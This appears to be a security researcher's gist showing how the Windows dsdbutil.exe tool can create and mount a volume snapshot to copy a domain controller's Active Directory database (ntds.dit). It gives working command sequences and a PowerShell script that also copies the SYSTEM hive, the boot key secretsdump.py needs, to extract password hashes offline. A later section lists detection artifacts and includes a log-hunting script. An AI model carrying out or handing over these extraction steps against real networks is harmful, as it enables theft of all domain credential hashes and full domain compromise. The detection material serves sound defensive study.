bohops/88561ca40998e83deb3d1da90289e358
Last active: February 21, 2023 14:29
yet another native AD database extraction utility
DSDButil
========
- dsdbutil (dsdbutil.exe) is a utility for performing maintenance on AD LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]; as the examples below show, it also activates the AD DS "ntds" instance
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py, which also needs the SYSTEM registry hive from the same snapshot for the boot key that protects the hashes)
- Example #1: Using the snapshot GUID obtained from the "create" command's output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"
- Example #2: Living dangerously with an (assumed) snapshot index: "mount 1" and "delete 1" refer to the first entry in "list all", which is only the snapshot just created if no other snapshots exist on the host
dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"
*dsdbutil also supports an interactive mode, which is likely more stable than the examples above.
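The Example #1 flow as a single script, added here as an illustration and not code from the gist. It parses the snapshot GUID and the "$SNAP_" mount point out of dsdbutil's own output instead of assuming an index, copies the SYSTEM hive alongside ntds.dit (secretsdump.py needs its boot key), and always unmounts and deletes the snapshot afterwards. Assumptions: it runs elevated on a domain controller that has dsdbutil.exe; "create" prints the new snapshot set's GUID in braces and "mount" prints a mount point of the form <drive>:\$SNAP_<timestamp>_VOLUME<drive>$\ (the prefix the defensive notes below describe); the $OutDir default and the script name are made up.

```powershell
# Added example, not code from bohops' gist: Example #1 scripted so the snapshot
# GUID and the $SNAP_ mount point are parsed from dsdbutil's output rather than
# assumed, with cleanup guaranteed by try/finally.
# Assumptions: elevated session on a DC with dsdbutil.exe; "create" prints the
# GUID in braces; "mount" prints <drive>:\$SNAP_..._VOLUME<drive>$\; $OutDir is
# a made-up destination.
param(
    [string]$DsdbUtil = "$env:SystemRoot\System32\dsdbutil.exe",  # ntdsutil.exe has the same snapshot menu
    [string]$OutDir   = "$env:USERPROFILE\Desktop\ntds-export"
)

$ErrorActionPreference = 'Stop'

# dsdbutil takes each menu command as its own argument, as in the one-liners above.
function Invoke-DsdbUtil {
    param([string[]]$SnapshotCommands)
    $argList = @('activate instance ntds', 'snapshot') + $SnapshotCommands + @('quit', 'quit')
    & $DsdbUtil @argList | Out-String
}

# 1. create the snapshot and pull its GUID out of the output
$createOut = Invoke-DsdbUtil @('create')
$guidMatch = [regex]::Match($createOut, '\{[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}')
if (-not $guidMatch.Success) { throw "No snapshot GUID in dsdbutil output:`n$createOut" }
$guid = $guidMatch.Value

try {
    # 2. mount it and pull the $SNAP_ mount point out of the output
    $mountOut  = Invoke-DsdbUtil @("mount $guid")
    $pathMatch = [regex]::Match($mountOut, '[A-Za-z]:\\\$SNAP_[^\s\\]+\\?')
    if (-not $pathMatch.Success) { throw "No `$SNAP_ mount point in dsdbutil output:`n$mountOut" }
    $snapRoot = $pathMatch.Value

    # 3. copy ntds.dit plus the SYSTEM hive from the same snapshot; secretsdump.py
    #    needs the hive's boot key (secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL)
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    Copy-Item (Join-Path $snapRoot 'Windows\NTDS\ntds.dit') (Join-Path $OutDir 'ntds.dit')
    Copy-Item (Join-Path $snapRoot 'Windows\System32\config\SYSTEM') (Join-Path $OutDir 'SYSTEM')
    Write-Host "Copied ntds.dit and SYSTEM from $snapRoot to $OutDir"
}
finally {
    # 4. clean up even if the copy failed: unmount, then delete the snapshot set
    Invoke-DsdbUtil @("unmount $guid") | Out-Null
    Invoke-DsdbUtil @("delete $guid")  | Out-Null
}
```

Run it as `.\Get-NtdsFromSnapshot.ps1` (hypothetical file name) from an elevated prompt; pass -DsdbUtil "$env:SystemRoot\System32\ntdsutil.exe" on a DC without dsdbutil.exe, since both tools expose the same snapshot menu. Everything the script does still produces the process command line, the 7036/98 system events and the $SNAP_ path described in the defensive notes.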
===========================
*Defensive Considerations
I chatted with @SBousseaden about a few Sysmon detection strategies. Here are a few ideas:
- Command-line logging is interesting: dsdbutil can run a string of commands (i.e. as demonstrated above),
which lands in the process command line, or run interactively (which hides the actual commands from command-line logging)
- Although a bit cumbersome, the "Service Control Manager" source for VSS will be logged as System Event ID 7036 with
a description of "The Microsoft Software Shadow Copy Provider service entered the running state."
- If a volume is mounted, an "NTFS" source will be logged as System Event ID 98 with a description highlighting
the Volume Shadow Copy ID, such as "Volume ?? (\Device\HarddiskVolumeShadowCopy17) is healthy. No action is needed."
- With a mount operation, dsdbutil mounts the snapshot at the logical drive root with a prefix
of "$SNAP_" (e.g. C:\$SNAP_201906250551_VOLUMEC$\). This has utility for monitoring interesting "Image Names"
or paths in Sysmon events (e.g. FileCreate, Execute, etc.).
- And of course, Sysmon events that contain "HarddiskVolumeShadowCopy" within the Image and CmdLine fields are always interesting as well
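A hunt script that pulls the artifacts listed above out of the local event logs, added here as an illustration and not code from the gist or from @SBousseaden. It collects Sysmon ProcessCreate/FileCreate events that reference a shadow-copy device path or a "$SNAP_" mount point (or launch dsdbutil/ntdsutil at all, which survives the interactive case where the command line is bare), the Service Control Manager 7036 event for the Microsoft Software Shadow Copy Provider, and the NTFS 98 event for a HarddiskVolumeShadowCopy volume. Assumptions: Sysmon logs to Microsoft-Windows-Sysmon/Operational with event IDs 1 and 11 enabled; the 7036/98 message strings are the English ones quoted above; $Hours is a made-up lookback parameter.

```powershell
# Added example, not from the gist: pull the dsdbutil/VSS artifacts described in
# the defensive notes out of the local event logs and print one line per hit.
# Assumptions: Sysmon installed with ProcessCreate (1) and FileCreate (11) enabled;
# English event message strings; $Hours is a made-up lookback window.
param([int]$Hours = 24)

$since = (Get-Date).AddHours(-$Hours)

# Sysmon EventData is XML; turn the <Data Name="..."> elements into a hashtable.
function Get-SysmonData {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $data = @{}
    $xml = [xml]$Event.ToXml()
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $data
}

# Markers from the notes above: shadow-copy device paths and the $SNAP_ mount prefix.
$snapshotMarkers = @('HarddiskVolumeShadowCopy', '\$SNAP_')

function Test-SnapshotMarker {
    param([string[]]$Values)
    foreach ($v in $Values) {
        if (-not $v) { continue }
        foreach ($m in $snapshotMarkers) { if ($v -match $m) { return $true } }
    }
    $false
}

$hits = @()

# 1. Sysmon ProcessCreate / FileCreate touching a shadow copy or $SNAP_ path, plus
#    any dsdbutil/ntdsutil launch (the image name survives even when the command
#    line is bare because the operator used the interactive mode)
$sysmon = Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1,11; StartTime=$since} -ErrorAction SilentlyContinue
foreach ($e in $sysmon) {
    $d = Get-SysmonData $e
    $fields = @($d['Image'], $d['CommandLine'], $d['ParentImage'], $d['TargetFilename'])
    $isTool = $d['Image'] -match '\\(dsdbutil|ntdsutil)\.exe$'
    if ($isTool -or (Test-SnapshotMarker $fields)) {
        $hits += [pscustomobject]@{ Time=$e.TimeCreated; Source='Sysmon'; Id=$e.Id; Detail=($fields -join ' | ') }
    }
}

# 2. SCM 7036: Microsoft Software Shadow Copy Provider entering the running state
$scm = Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Service Control Manager'; Id=7036; StartTime=$since} -ErrorAction SilentlyContinue
foreach ($e in ($scm | Where-Object { $_.Message -match 'Shadow Copy Provider' -and $_.Message -match 'running' })) {
    $hits += [pscustomobject]@{ Time=$e.TimeCreated; Source='SCM'; Id=$e.Id; Detail=$e.Message }
}

# 3. NTFS 98: a \Device\HarddiskVolumeShadowCopyN volume coming online (snapshot mounted)
$ntfs = Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Microsoft-Windows-Ntfs'; Id=98; StartTime=$since} -ErrorAction SilentlyContinue
foreach ($e in ($ntfs | Where-Object { $_.Message -match 'HarddiskVolumeShadowCopy' })) {
    $hits += [pscustomobject]@{ Time=$e.TimeCreated; Source='NTFS'; Id=$e.Id; Detail=$e.Message }
}

$hits | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Run it on the DC (or point Get-WinEvent at a collected .evtx with -Path instead of -FilterHashtable's LogName) and read the three sources together: 7036 and 98 also fire for legitimate backups and are weak on their own, so the useful signal is a shadow-copy service start or volume-healthy event within a few minutes of a Sysmon hit whose Image, CommandLine or TargetFilename carries "$SNAP_" or "HarddiskVolumeShadowCopy", or of a dsdbutil/ntdsutil launch with an empty-looking command line.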